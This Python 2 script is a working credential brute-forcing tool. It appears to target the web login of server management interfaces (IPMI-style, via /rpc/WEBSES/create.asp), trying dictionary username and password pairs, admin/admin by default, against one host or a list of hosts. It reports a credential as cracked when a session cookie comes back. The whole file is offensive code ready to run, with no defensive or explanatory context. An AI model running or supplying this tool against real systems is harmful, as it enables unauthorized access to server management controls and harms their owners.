#!/usr/bin/env python
# -*- coding:utf-8 -*-
#import lib files
import os
import sys
import logging
import requests
from optparse import OptionParser
#global configuration set
reload(sys)
sys.setdefaultencoding("utf-8")
logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)
#global varites defines
HEADER = {
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
"Accept":"application/json, text/plain, */*",
"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding":"gzip, deflate",
"Content-Type":"application/json;charset=utf-8"
}
SUCCESS_FLAG = "SESSION_COOKIE"
USERNAME_LIST = ["admin"]
PASSWORD_LIST = ["admin"]
#global functions defines
def config_read_from_file(userfile,pswdfile):
global USERNAME_LIST
global PASSWORD_LIST
logging.info("[+] Read Configuration From File ...")
try:
with open(userfile,"r") as fr:
for line in fr.readlines():
line = line.split("\n")[0].split("\r")[0]
USERNAME_LIST.append(line)
except Exception,ex:
logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
logging.error(logstr)
logging.info("[+] Use Default Dict!")
try:
with open(pswdfile,"r") as fr:
for line in fr.readlines():
line = line.split("\n")[0].split("\r")[0]
PASSWORD_LIST.append(line)
except Exception,ex:
logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
logging.error(logstr)
logging.info("[+] Use Default Dict!")
return 0
def login_packet_send(target,username,password):
login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}
try:
response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5)
except Exception,ex:
logstr = "[-] Connect Failed Reason:%s"%str(ex)
logging.error(logstr)
return -1
if response.status_code != 200:
return -1
else:
return response.content
def vuln_check(content):
if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0:
return 0
else:
return -1
def crack(target,username,password):
content = login_packet_send(target,username,password)
if content != -1:
if vuln_check(content) == 0:
logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))
return 0
return -1
def scan(target,targettype):
targetlist = []
if targettype == 1:
try:
with open(target,"r") as fr:
for line in fr.readlines():
line = line.split("\n")[0].split("\r")[0].replace(" ","")
targetlist.append(line)
except Exception,ex:
pass
else:
targetlist = [target]
if len(target) > 0:
for item in targetlist:
for user in USERNAME_LIST:
for pswd in PASSWORD_LIST:
crack(item,user,pswd)
#main function -- programme
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-t", "--target", dest="target",help="target to check")
parser.add_option("-f", "--filename", dest="targetfile",help="targetfiel to check")
parser.add_option("-u", "--userfile", dest="userfile",help="username dict")
parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict")
(options, args) = parser.parse_args()
config_read_from_file(options.userfile,options.pswdfile)
if options.target not in ["",None," "]:
scan(options.target,0)
elif options.targetfile not in ["",None," "]:
scan(options.targetfile,1)